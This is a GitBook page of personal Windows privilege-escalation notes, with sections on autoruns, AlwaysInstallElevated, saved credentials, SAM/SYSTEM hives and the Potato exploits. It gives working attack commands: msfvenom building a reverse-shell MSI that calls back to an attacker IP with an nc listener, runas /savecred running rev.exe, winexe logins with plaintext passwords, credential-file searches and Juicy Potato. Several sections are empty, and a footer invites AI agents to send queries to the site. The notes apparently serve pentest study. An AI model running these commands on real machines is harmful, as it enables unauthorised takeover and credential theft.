# Windows 1. Check user (whoami) and groups (net user \) 2. Run winPEAS with fast, searchfast, and cmd options. 3. Run Seatbelt & other script as well (PowerUP.ps1, SharpUp, etc) 4. If your scripts are failing and you don't know why, you can always run the manual commands from this source, and other Windows PrivEsc cheatsheets {% embed url="" %} Strategy: Spend some time and read over the result of your enumeration. if WinPEAS or other tool finds something interesting, make a note of it. Avoid rabbit holes by creating a checklist of things you need for the priviledge escalation method to work. Have a quick look around for files in user's desktop and other common location (ex: C:\ and C:\Program Files), Read through interesting files that you find, as they may contain useful information that could help escalate priviledge. {% hint style="info" %} Have a good look at admin processes, enumerate their versions and search for exploits. check for internal port that you might be able to forward to your attacking machine. Try things that don't have many steps firs: * registry exploit, services, etc. {% endhint %} > If you still don't have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with or even a username. > > At this stage you can also start to think about Kernel Exploit. ## Registry Exploits | Requirement to success: | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | | ### AutoRuns Change the Program.exe to the reverseShell.exe. then restart the computer to get the application run in the manual check: ``` reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run # check the directory permission .\accesschk.exe /accepteula -wvu "" ``` ### AlwaysInstallElevated ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.y LPORT=53 -f msi -o reverse.msi # nc -lvnp 53 ``` execute the reverse shell: ``` msiexec /quite /qn /i reverse.msi ``` ## Service Exploits | Requirement to success: | | ----------------------- | | | ## Passwords | Requirement to success: | | ---------------------------------------------------------------------------------------------------------------------------------------- | | `.\winPEASany.exe quite filesinfo userinfo` -> search for **AutoLogon credentials(T1012)** | login to other user in windows: ``` winexe -U 'admin%password123' // cmd.exe # nt authority winexe -U 'admin%password123' --system // cmd.exe ``` ### SaveCred ``` cmdkey /list # exploit runas /savecred /user:admin C:\Windows\Tasks\rev.exe ``` ### Password in Configuration ``` .\winPEASany.exe quite cmd searchfast filesinfo ``` search for --> **possible known files that can contain creds(T1083\&T1081)** or use this cmd command to find the creds: ``` dir /s *pass* == *.config find /si password *.xml *.ini *.txt ``` ### SAM/SYSTEM Locations file location: ``` dir c:\windows\system32\config dir c:\windows\repair dir c:\windows\system32\config\regback ``` or use winPEAS ``` .\winPEASany.exe quite cmd searchfast filesinfo ``` search for --> **possible known files that can contain creds(T1083\&T1081)** copy file **SAM** and **SYSTEM** to kali linux. ## Scheduled Tasks | Requirement to success: | | ----------------------- | | | ## Insecure GUI Apps | Requirement to success: | | ----------------------- | | | ## Startup Apps | Requirement to success: | | ----------------------- | | | ## Installed Apps | Requirement to success: | | ----------------------- | | | ## Hot Potato | Requirement to success: | | ---------------------------------------- | | Windows 7,8,10, Server 2008, Server 2012 | ``` .\potato.exe -p 10.10.x.y -cmd "C:\Windows\Tasks\rev.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true ``` ## Juicy Potato | Requirement to success: | | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
  • usually a service account
  • whoami /priv -> SeImpersonatePrivilege Enabled
| ``` # .\Juicypotato.exe -l .\JuicyPotato.exe -l 1337 -p C:\Windows\Tasks\rev.exe -t * -c ``` \
{% hint style="info" %} Make sure the CLSID is the right one. If stuck, check this out --> {% endhint %} ## Port Forwarding | Requirement to success: | | ----------------------- | | | ## Kernel Exploits | Requirement to success: | | ----------------------- | | | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacker-mind.gitbook.io/hacker-mind/privilege-escalation/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.